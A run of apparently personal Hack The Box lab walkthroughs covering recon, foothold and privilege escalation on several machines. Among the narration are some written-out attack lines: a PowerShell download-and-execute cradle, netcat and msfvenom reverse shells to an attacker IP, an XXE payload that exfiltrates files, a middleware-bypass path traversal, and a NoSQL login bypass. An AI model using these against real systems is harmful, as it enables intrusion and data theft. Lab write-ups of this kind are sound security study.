enum4linux-ng -U 10.10.11.42

Foothold

evil-winrm - Olivia

I did some other enum as well before ultimately logging in via evil-winrm using the provided creds for Olivia:

Here I started doing some recon on the target:

BloodHound

In order to map the domain I used bloodhound-ce-python:

I uploaded the resulting files to bloodhound-ce and checked it out.

I had a clear path written out to follow:

GenericAll

First things first I had to take over michael's user by abusing the GenericAll GPO.

I used the following command for a targeted kerberoast:

Unfortunately the hash could not be cracked by john:

Instead I successfully changed michael's password using bloodyAD:

Michael
P@ssword123!

ForceChangePassword

I could now do the exact same but for the Benjamin user:

Benjamin
P@ssword123!

445/TCP - SMB

I used the spider_plus extension on nxc to quickly spider the shares:

And this one looked interesting as well:

I logged into \SYSVOL:

I downloaded the files that I deemed were of interest:

These however didn't look promising at all:

This seemed like a rabbit hole, time to explore different routes.

21/TCP - FTP

I logged in with the creds for Benjamin into ftp:

Here I found an interesting Backup.psafe3 file which I downloaded to my Kali:

john

I easily cracked the password:

tekieromucho

Psafe3

I download the following binary in order to view the password manager:

I then used the cracked password to log in:

creds

alexander
UrkIbagoxMyUGw0aPlj9B0AXSea4Sw

emily
UXLCI5iETUsIBoFVTj8yQFKoHjXmb

emma
WwANQWnmJnGV07WQN8bMS7FMAbjNur

I then went ahead and password sprayed these creds to see which one would stick:

Looks like we can use Emily to log in.

user.txt

I logged in with the credentials for Emily and got the flag.

GenericWrite

I didn't hold any interesting privs but I still checked my GPO's in bloodhound where I found that I had GenericWrite privs over Ethan:

I can use a targeted kerberoast to get the krb5tgs hash for Ethan.

Ethan
limpbizkit

Privilege Escalation

DCSync

Now that I had Ethan's creds I could easily abuse the DCSync privileges in combination with impacket-secretsdump:

And then use impacket-psexec to log in using the Admin hash:

root.txt

HTB-Editor

Maxim Andrei Koltypin — Tue, 16 Sep 2025 00:00:00 GMT

Scope:
10.10.11.80

Recon

Nmap

sudo nmap -sV -sC -sT -p- 10.10.11.80 -T5 --min-rate=5000 -vvvv -Pn

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://editor.htb/
8080/tcp open  http    syn-ack Jetty 10.0.20
|_http-server-header: Jetty(10.0.20)
| http-methods: 
|   Supported Methods: OPTIONS GET HEAD PROPFIND LOCK UNLOCK
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
| http-webdav-scan: 
|   WebDAV type: Unknown
|   Server Type: Jetty(10.0.20)
|_  Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
| http-robots.txt: 50 disallowed entries (40 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/ 
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/ 
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/ 
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/ 
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/ 
| /xwiki/bin/undelete/ /xwiki/bin/reset/ /xwiki/bin/register/ 
| /xwiki/bin/propupdate/ /xwiki/bin/propadd/ /xwiki/bin/propdisable/ 
| /xwiki/bin/propenable/ /xwiki/bin/propdelete/ /xwiki/bin/objectadd/ 
| /xwiki/bin/commentadd/ /xwiki/bin/commentsave/ /xwiki/bin/objectsync/ 
| /xwiki/bin/objectremove/ /xwiki/bin/attach/ /xwiki/bin/upload/ 
| /xwiki/bin/temp/ /xwiki/bin/downloadrev/ /xwiki/bin/dot/ 
| /xwiki/bin/delattachment/ /xwiki/bin/skin/ /xwiki/bin/jsx/ /xwiki/bin/ssx/ 
| /xwiki/bin/login/ /xwiki/bin/loginsubmit/ /xwiki/bin/loginerror/ 
|_/xwiki/bin/logout/
|_http-open-proxy: Proxy might be redirecting requests
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

Down at the bottom I noticed a Documentation tab which when clicked showed the following:

I had to edit this entry to my /etc/hosts list.

I then ran ffuf to see whether I could find more vhosts but it appears this was the only one:

Moving onto wiki.

I noticed the user Neal Bagwell, might need this later on to log in.

Furthermore I noticed a version number:

Apparently there are plenty of CVE's for this version:

I settled for this one:

Foothold

Shell as xwiki

I used the busybox reverse shell command to get in:

I noticed a plethora of open ports:

Enumeration

I then downloaded and ran linpeas.sh:

This one seemed interesting as well if we can get access to a user who's in the netdata group:

I didn't really find anything else interesting so decided to look up the docs.

I headed on over to the following directory where I landed in initially to enumerate it further.

Here I found this file which I then proceded to check out:

Inside the hibernate.cfg.xml file I found juicy cleartext creds:

xwiki
theEd1t0rTeam99

MySQL

Using the found creds I was able to access mysql and enumerate it:

However I didn't find anything of use here so instead sprayed the password against the found oliver user.

Lateral Movement - oliver

The credentials matched and I was able to move laterally:

user.txt

Privilege Escalation

netdata - ndsudo

This user was part of the netdata group:

I can use the previously found binaries that are non-default.

I then transfered it over and executed it after adding /tmp to my $PATH:

root.txt

HTB-Delivery

Maxim Andrei Koltypin — Tue, 16 Sep 2025 00:00:00 GMT

Scope:
10.10.10.222

Recon

Nmap

sudo nmap -sV -sC -sT -p- 10.10.10.222 -T5 --min-rate=5000 -vvvv -Pn

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open  http    syn-ack nginx 1.14.2
|_http-title: Welcome
|_http-server-header: nginx/1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD
8065/tcp open  http    syn-ack Golang net/http server
| http-methods: 
|_  Supported Methods: GET
|_http-favicon: Unknown favicon MD5: 6B215BD4A98C6722601D4F8A985BF370
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Mattermost
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: no-cache, max-age=31556926, public
|     Content-Length: 3108
|     Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
|     Content-Type: text/html; charset=utf-8
|     Last-Modified: Tue, 16 Sep 2025 06:22:01 GMT
|     X-Frame-Options: SAMEORIGIN
|     X-Request-Id: zoepm6m5st8zpydro6dgggprch
|     X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
|     Date: Tue, 16 Sep 2025 07:10:40 GMT
|     <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
|   GenericLines, Help, RTSPRequest, SSLSessionReq: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: no-cache, max-age=31556926, public
|     Content-Length: 3108
|     Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
|     Content-Type: text/html; charset=utf-8
|     Last-Modified: Tue, 16 Sep 2025 06:22:01 GMT
|     X-Frame-Options: SAMEORIGIN
|     X-Request-Id: 3qwkqzys5fnx9p7x5c44z3pbje
|     X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
|     Date: Tue, 16 Sep 2025 07:10:24 GMT
|     <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Date: Tue, 16 Sep 2025 07:10:25 GMT
|_    Content-Length: 0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

I went on over to the website and found this:

When clicking on it it takes us to helpdesk.delivery.htb, which means that I have to add a vhost to my /etc/hosts list.

Now when I run gobuster I find some interesting endpoints:

Heading on over to the vhost I find the following:

burpsuite

In Check Ticket Status there's a mention of registering an account so I try it out.

Clicking on it I see this URL:

:::note It might be vulnerable to IDOR, SQLi or LFI in the best case. :::

I registered for a sample account and checked burp:

But this tells us that we need to verify the email, nonetheless we can continue on as the Guest user.

I could then create and submit a ticket:

I could then view the ticket:

8065/TCP - HTTP

I then went on over to the Mattermost instance on port 8065 where I could register using the provided email address when I created the ticket:

Back on port 80 I can now refresh the page and see the following content appear:

I copy and paste the link and see this:

I was able to join the Internal team server where I found the following conversations:

maildeliverer
Youve_G0t_Mail!

Foothold

SSH as maildeliverer

I log in with the found credentials.

user.txt

Inside the /opt directory I find the mattermost folder.

mmuser
Crack_The_MM_Admin_PW

3306/TCP - MySQL

Using the found creds I logged in:

This gave an absolute boatload of output.

Amongst all the noise however I was also able to find root:

Privilege Escalation

hashcat - rule based

I used hashcat with the best64.rule to crack the hash:

It was simply a variation on the cleartext password that we've already found previously in the Internal channel. Let's log in.

root.txt

:::note

Here is the link to the post :::

HTB-Previous

Maxim Andrei Koltypin — Wed, 17 Sep 2025 00:00:00 GMT

Scope:
10.10.11.83

Recon

Nmap

sudo nmap -sV -sC -sT -p- 10.10.11.83 -T5 --min-rate=5000 -vvvv -Pn

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: PreviousJS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

Clicking ond Docs takes me to the following screen:

I tried out using admin - admin and saw the following result:

CVE-2025-29927

Since I found nothing else useful I decided to look it up online:

[!quote]+ The vulnerability lies in the fact that this header check can be exploited by external users. By adding the x-middleware-subrequest header with the correct value to a request, an attacker can completely bypass any middleware-based protection mechanisms.Here's how the vulnerability works at the code level Javascript

Following up there was a whole text about which NextJS version could be exploited in what way so I decided to check the current version running:

This version probably falls under the following:

Using this knowledge I ran dirrsearch using the -H (header) option with the above exploit:

dirsearch -u http://previous.htb/api -H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware'

Parameter Fuzzing

Using the burp-parameter-names.txt I fuzzed the parameter that was associated with the /download? endpoint:

ffuf -u 'http://previous.htb/api/download?FUZZ=a' -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware' -mc all -fw 2

[!danger]+ Don't forget to include the -mc all and -fw 2 options or it won't show up as the status code is 404:

LFI

As for further testing I started off with Path Traversal:

curl 'http://previous.htb/api/download?example=../../../../../etc/passwd' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' -v

So what can we do now? I tried checking for ssh keys but wasn't able to read any if they even existed.

Instead I checked the following:

The /proc/self/environ file was especially useful here.

NODE_VERSION=18.20.8
HOSTNAME=0.0.0.0
YARN_VERSION=1.22.22
SHLVL=1
PORT=3000
HOME=/home/nextjs
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
NEXT_TELEMETRY_DISABLED=1
PWD=/app
NODE_ENV=production

We now have gathered that the directory we should be looking in is called /app, but what sub-folders does it contain?

NextJS sub-folder structure.

Looking further into the next/ directory:

Using this command I could then see the endpoint logic:

curl 'http://previous.htb/api/download?example=../../../../../app/.next/routes-manifest.json' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' -v --output -

The /api/auth/[...nextauth] is especially telling since it explains the authentication logic.

Going back to what other sub-folders are compiled within .next/:

Diving deeper into server/pages now.

This needs to be URL encoded.

curl 'http://previous.htb/api/download?example=../../../../../app/.next/server/pages/api/auth/%5b...nextauth%5d.js' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' -v --output -

We get a set of cleartext credentials out of it!

Jeremy
MyNameIsJeremyAndILovePancakes

Foothold

ssh as Jeremy

We can log in as Jeremy which is odd since he was not present inside the /etc/passwd list.

user.txt

[!note]+ Seeing the presence of the docker interface means that the web instance was HIGHLY LIKELY running from there.

Enumeration

Continuing on I noticed the .terraformrc file so I checked sudo -l:

So what does this binary actually do?

Terraform

Diving deeper into /opt/examples I find this:

:::note My current user does not have any write privileges. :::

I took a dive into the docs where I found:

Privilege Escalation

Abusing Terraform

I noticed that the PATH was set to the following:

So I changed it to /tmp whereafter I added the following.

I then ran the command:

I could then verify it using ls -la:

Now all that's left is to /bin/bash -p:

root.txt

HTB-Access

Maxim Andrei Koltypin — Thu, 18 Sep 2025 00:00:00 GMT

Scope:
10.10.10.98

Recon

Nmap

sudo nmap -sV -sC -sT -p- access.htb -T5 --min-rate=5000 -vvvv -Pn

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Cant get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet  syn-ack Microsoft Windows XP telnetd (no more connections allowed)
80/tcp open  http    syn-ack Microsoft IIS httpd 7.5
|_http-title: MegaCorp
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

I noticed that ftp was readable using anon access.

21/TCP - FTP

I found the backup.mdb file inside the Backups directory which I transferred over and analyzed it using strings:

As well as the Access Control.zip file inside the Engineer directory.

zip file

This latter file was password protected:

We can try to crack it using zip2john

However this did not work:

Instead I went ahead and used the output of the backup.mdb file in combination with strings to create a password list which I then would use to crack the password:

access4u@security

I used this password to open up the zip file which extracted the Access Control.pst file:

.pst file

I had to look up what a .pst file extension even was:

We can use the readpst binary to read it:

We can now go ahead and use cat to read the contents of the newly created file:

security
4Cc3ssC0ntr0ller

Foothold

23/TCP - Telnet

Using telnet we were able to get ez access:

user.txt

I then went on to get the user.txt flag:

Enumeration

I found some interesting directories inside the C:\ drive.

I then wanted to do some automated enum but got blocked:

The group policy wouldn't let me.

However I could execute powershell commands:

So I then used this powershell reverse shell where I appended the following:

Then using the following command I don't have to manually trigger the shell anymore, it get's executed on download:

powershell "IEX(New-Object Net.WebClient).downloadstring('http://10.10.14.6/shell.ps1')"

Privilege Escalation

Stored Creds

Using the cmdkey /list command we figure out that there are stored creds for the Administrator on the machine:

Since these creds should give us direct access as the Admin we can abuse this using the runas command.

runas /savecreds /user:ACCESS\Administrator "nc.exe 10.10.14.6 443 -e bash"

Unfortunately it connected but instantly kicked us off:

We need something with more persistence.

msfvenom

Using the following msfvenom payload the shell stayed up and I had elevated access:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f exe > shell.exe

root.txt

HTB-Expressway

Maxim Andrei Koltypin — Sun, 21 Sep 2025 00:00:00 GMT

Scope:
10.10.11.87

Recon

Nmap

sudo nmap -sV -sC -sT -p- expressway.htb -T5 --min-rate=5000 -vvvv -Pn 

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only one port showed up so I decided to run a UDP scan as well.

sudo nmap -sV -sC -sU -p- expressway.htb -T5 --min-rate=5000 -vvvv -Pn

Discovered open port 500/udp on 10.10.11.87

Since the 500 port showed up I reran the scan focussing on this port.

sudo nmap -sV -sC -sU -p500 expressway.htb -T5 --min-rate=5000 -vvvv -Pn

PORT    STATE SERVICE REASON              VERSION
500/udp open  isakmp? udp-response ttl 63
| ike-version: 
|   attributes: 
|     XAUTH
|_    Dead Peer Detection v1.0

500/UDP - ISAKMP

Using this resource I was able to learn more about this service.

Reading further down:

Let's get to it:

ike-scan -M --showbackoff expressway.htb

IKE Xauth

Since we're dealing with Xauth here we'll have to follow along with this part:

Using the -A aggressive mode we can acquire hashes and identities in cleartext:

As well as the psk hashes:

Hash cracking

I can find the correct hash format as follows:

The ike-scan previously told us we're dealing with a SHA1 hash:

Let's get to cracking.

ike@expressway.htb
freakingrockstarontheroad

Foothold

SSH as ike

We can use these creds to login via ssh:

Here we can instantly pick up user.txt.

Privilege Escalation

Enumeration

I noticed this user was part of the proxy group:

We weren't able to run sudo either:

For automated enum I ran linpeas:

From my memory I had previously found an exploit that could easily give us root by exploiting this sudo version:

Let's try it out:

EZ PZ root.

HTB-MetaTwo

Maxim Andrei Koltypin — Mon, 22 Sep 2025 00:00:00 GMT

Scope:
10.10.11.186

Recon

Nmap

sudo nmap -sV -sC -sT -p- metatwo.htb -T5 --min-rate=5000 -vvvv -Pn

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp?    syn-ack
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    syn-ack nginx 1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://metapress.htb/

80/TCP - HTTP

I used gobuster to enumerate the website and noticed that it was running WordPress:

Heading over to the site we notice a simple landing page:

I then headed over to /wp-admin to try and login using default creds:

This tells us that the user admin does exist.

:::note We can possibly brute-force it in case xmlrpc is enabled :::

wpscan

Running wpscan we notice that it's in fact enabled meeaning we can try to throw a wordlist against it. But first we'll check further down for the results.

:::note The twentytwentyone theme is vulnerable, once we're inside we can get a webshell/reverse shell by modifying the 404.php page in order to achieve the desired results. :::

brute forcing xmlrpc - FAIL

Using the following command I try to brute force the admin credentials:

sudo wpscan --password-attack xmlrpc -t 20 -U admin -P /usr/share/wordlists/rockyou.txt --url http://metapress.htb/ --ignore-main-redirect

This took way too long however so naturally I continued on while leaving the brute force running.

I also found another user using the following command:

sudo wpscan --enumerate u -t 20 --url http://metapress.htb/ --ignore-main-redirect

I then tried out brute forcing manager as well.

XSS in search parameter - FAIL

Back on the main page I found a Search input bar:

Here I could enter anything I wanted and got the following result:

Analyzing the request further in burp yielded this result:

I tried to see whether this was injectable using XSS:

I then tried out xsstrike and got some false positives which didn't end up working.

Moving on

Page source enum

Clearly I was still missing something so I went ahead and enumerated the other page that was accessible:

curl -s http://metapress.htb/events/ | grep plugins

Above I found another plugin that wasn't found by wpscan on the mainpage, namely bookingpress-appointment-booking.

I then looked up the version to see whether it's exploitable.

There's a PoC on github available.

Foothold

CVE-2022-0739 - PoC

I went ahead and used this PoC from github:

As for the nonce it's mentioning, we can find it in this request:

Combining the two we get the following result:

We can try and crack these hashes.

Hash cracking

We'll be using mode 400 as per the docs:

manager
partylikearockstar

We can now go ahead and use these creds to log in.

CVE-2021-29447 - XXE

I started looking around for exploits for this WordPress instance:

Clicking on it I read the following:

PoC

We'll basically need 2 files:

malicious.wav:

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.5:80/xxe.dtd'"'"'>%remote;%init;%trick;] >\x00'> malicious.wav

And xxe.dtd:

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#37; trick SYSTEM 'http://10.10.14.5/?p=%file;'>" >

We then go ahead and upload the file:

Once we click it we get the response:

Next up we can use the following script in order to decrypt the response:

<?php

echo zlib_decode(base64_decode('jVRNj5swEL3nV3BspUSGkGSDj22lXjaVuum9MuAFusamNiShv74zY8gmgu5WHtB8vHkezxisMS2/8BCWRZX5d1pplgpXLnIha6MBEcEaDNY5yxxAXjWmjTJFpRfovfA1LIrPg1zvABTDQo3l8jQL0hmgNny33cYbTiYbSRmai0LUEpm2fBdybxDPjXpHWQssbsejNUeVnYRlmchKycic4FUD8AdYoBDYNcYoppp8lrxSAN/DIpUSvDbBannGuhNYpN6Qe3uS0XUZFhOFKGTc5Hh7ktNYc+kxKUbx1j8mcj6fV7loBY4lRrk6aBuw5mYtspcOq4LxgAwmJXh97iCqcnjh4j3KAdpT6SJ4BGdwEFoU0noCgk2zK4t3Ik5QQIc52E4zr03AhRYttnkToXxFK/jUFasn2Rjb4r7H3rWyDj6IvK70x3HnlPnMmbmZ1OTYUn8n/XtwAkjLC5Qt9VzlP0XT0gDDIe29BEe15Sst27OxL5QLH2G45kMk+OYjQ+NqoFkul74jA+QNWiudUSdJtGt44ivtk4/Y/yCDz8zB1mnniAfuWZi8fzBX5gTfXDtBu6B7iv6lpXL+DxSGoX8NPiqwNLVkI+j1vzUes62gRv8nSZKEnvGcPyAEN0BnpTW6+iPaChneaFlmrMy7uiGuPT0j12cIBV8ghvd3rlG9+63oDFseRRE/9Mfvj8FR2rHPdy3DzGehnMRP+LltfLt2d+0aI9O9wE34hyve2RND7xT7Fw=='));

:::tldr Through the XXE vulnerability we were able to retrieve the /etc/passwd file and find the jnelson user. :::

I then tried to retrieve the id_rsa from this user:

Unfortunately I did not get a valid response:

So I tried out the following (with some variations until it worked):

I then went ahead and pasted it inside the decrypt.php script again.

blog
635Aq@TdqrCwXFUZ

metapress.htb
9NYS_ii@FyL_p5M2NvJ

22/TCP - FTP

Using the latter creds we were indeed able to log into ftp:

Diving further into the /mailer directory we find:

Reading the send_email.php file we find a set of SSH creds for jnelson:

jnelson
Cb4_JmWM8zUZWMu@Ys

SSH as jnelson

user.txt

I was directly able to get the user.txt flag:

Enumeration

Inside this /home directory however I was able to find some interesting stuff:

Checking the root.pass yields us a a PGP encrypted message.

:::question So what is passpie?

:::

Simply using the passpie command outputs *****.

Checking the version:

But this yields no PoC's, instead I copy over the .keys output in order to try and crack it.

Privilege Escalation

Hash cracking

gpg2john

We can then crack it using john:

blink182

Using this passphrase we can gather all the creds:

root
p7qfAZt4_A1xo_0x

We can now use these creds to log in as root:

root.txt

HTB-Driver

Maxim Andrei Koltypin — Wed, 24 Sep 2025 00:00:00 GMT

Scope:
10.10.11.106

Recon

Nmap

sudo nmap -sV -sC -sT -p- driver.htb -T5 --min-rate=5000 -vvvv -Pn

PORT     STATE SERVICE      REASON  VERSION
80/tcp   open  http         syn-ack Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Site doesnt have a title (text/html; charset=UTF-8).
135/tcp  open  msrpc        syn-ack Microsoft Windows RPC
445/tcp  open  microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

From the nmap scan it seems like there's an account on port 80 called admin.

80/TCP - HTTP

It seems like we're dealing with HTTP Basic Authentication. Since we already know the username we will only need to identify the password.

Using hydra I can quickly find out the credential combination:

Logging in brings me to the following page:

Clicking on Firmware Updates shows us this page:

I tried uploading a webshell.php:

The URL told us that it worked:

However I wasn't able to access the webshell since I didn't know where it got uploaded, burp didn't tell me either so there's probably a different route here.

445/TCP - SMB

I wasn't able to create a NULL session here, but this port is still open.

I started digging around when I found the following:

We can upload this file to the smb share through the webserver, and catch the hashes through responder.

PoC

By running sudo responder -I tun0 I then catch the hash for tony:

By using john we can easily crack the password.

tony
liltony

Foothold

5985/TCP - WinRM

Using the previously found creds we get easy access.

user.txt

Here we can get the user.txt right away:

Enumeration

After scrolling through it I found a scheduled task:

Before diving deeper into those files I enumerated further:

The above tells us that the Spooler service is running. We can use PrintNightmare.ps1 to easily get admin rights.

Privilege Escalation

CVE-2021-1675 - PrintNightmare

I downloaded over the script and added the tester user as follows:

I can now easily log in as this user:

root.txt

Cleaning Up

As part of the clean up we can now delete all files from the system and delete the created user:

HTB-Shoppy

Maxim Andrei Koltypin — Thu, 25 Sep 2025 00:00:00 GMT

Scope:
10.10.11.180

Recon

Nmap

sudo nmap -sV -sC -sT -p- shoppy.htb -T5 --min-rate=5000 -vvvv -Pn 

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp   open  http    syn-ack nginx 1.23.1
|_http-title:             Shoppy Wait Page        
|_http-server-header: nginx/1.23.1
|_http-favicon: Unknown favicon MD5: D5F0A0ADD0BFBB2BC51607F78ECE2F57
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
9093/tcp open  http    syn-ack Golang net/http server
|_http-trane-info: Problem with XML parsing of /evox/about
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: DEAA4EF1DE78FC2D7744B12A667FA28C
|_http-title: Site doesnt have a title (text/plain; version=0.0.4; charset=utf-8).
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/plain; version=0.0.4; charset=utf-8
|     Date: Thu, 25 Sep 2025 08:35:12 GMT

80/TCP - HTTP

The site did not have anything on the surface so I went ahead and used gobuster to enumerate it:

I then headed over to the /login page:

I then tried to submit default creds and viewed the output:

I tried manipulating it to achieve SQLi:

This isn't really helpful for now. Checking wappalyzer yields nothing interesting either:

NoSQL Injection

Since the ' was messing up the query and giving a timeout response it's still worth looking into NoSQL Injection in case the server is running something like MongoDB.

I searched for some payloads and found the following list:

I tried my luck and found a payload that actually worked!

username=admin' || '1'=='1&password=admin

I went ahead and entered it on the website:

Clicking on Search for users lets me search for any users and give me their data:

Burpsuite Intruder

I then analyzed the request and found that if the user exists, then the response would be a 304:

Otherwise it's a 200:

Using this knowledge we can initiate a burp Intruder attack where we use a list with usernames to fuzz for existing users.

Using an extensive list such as john.txt from the statistically-likely-usernames repo yields us the following result:

It appears that there's a user called josh!

Let's try cracking the MD5 hash.

josh
remembermethisway

NoSQLi Alternative

Since we already know that there's a NoSQLi vulnerability we can leverage it to find all present users:

Now that we've found creds we should be able to login, but where? SSH did not work so let's look further.

Subdomain fuzzing

I tried out port 9093 but that did not seem helpful in any way so I ran ffuf to enumerate further:

And I was able to find the mattermost subdomain!

mattermost

After adding the domain to my /etc/hosts I went ahead and visited the website:

I used the previously found creds to login:

Scrolling through the channels we find cleartext credentials posted:

jaeger
Sh0ppyBest@pp!

Foothold

SSH as jaeger

Using the found creds we get access to the target:

user.txt

We can grab the first flag right away:

Strings

I perform some surface level enum of the user:

This is the program josh was talking about in the chat:

Apparently it's written in C++, not sure whether that's useful for us right now.

I tested it out:

I tried the other password but that didn't work either:

I read the binary using strings to understand how it works underneath:

Furthermore we can use the -e option on strings in order to select character endianness:

Using the hardcoded credentials we can get access to creds.txt:

deploy
Deploying@pp!

This gives us the ability to move laterally.

Lateral Movement

Eventhough we weren't able to run sudo -l we still find that we're part of the docker group.

Privilege Escalation

Docker

This is an amazing position to be in since we can easily exploit the binary using GTFObins:

root.txt

HTB-Trick

Maxim Andrei Koltypin — Thu, 25 Sep 2025 00:00:00 GMT

Scope:
10.10.11.166

Recon

Nmap

sudo nmap -sV -sC -sT -p- trick.htb -T5 --min-rate=5000 -vvvv -Pn 

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open  smtp    syn-ack Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open  domain  syn-ack ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    syn-ack nginx 1.14.2
|_http-server-header: nginx/1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_http-title: Coming Soon - Start Bootstrap Theme
Service Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

I noticed the 53 port first which I used to zone transfer:

I found a subdomain called preprod-payroll.

80/TCP - HTTP

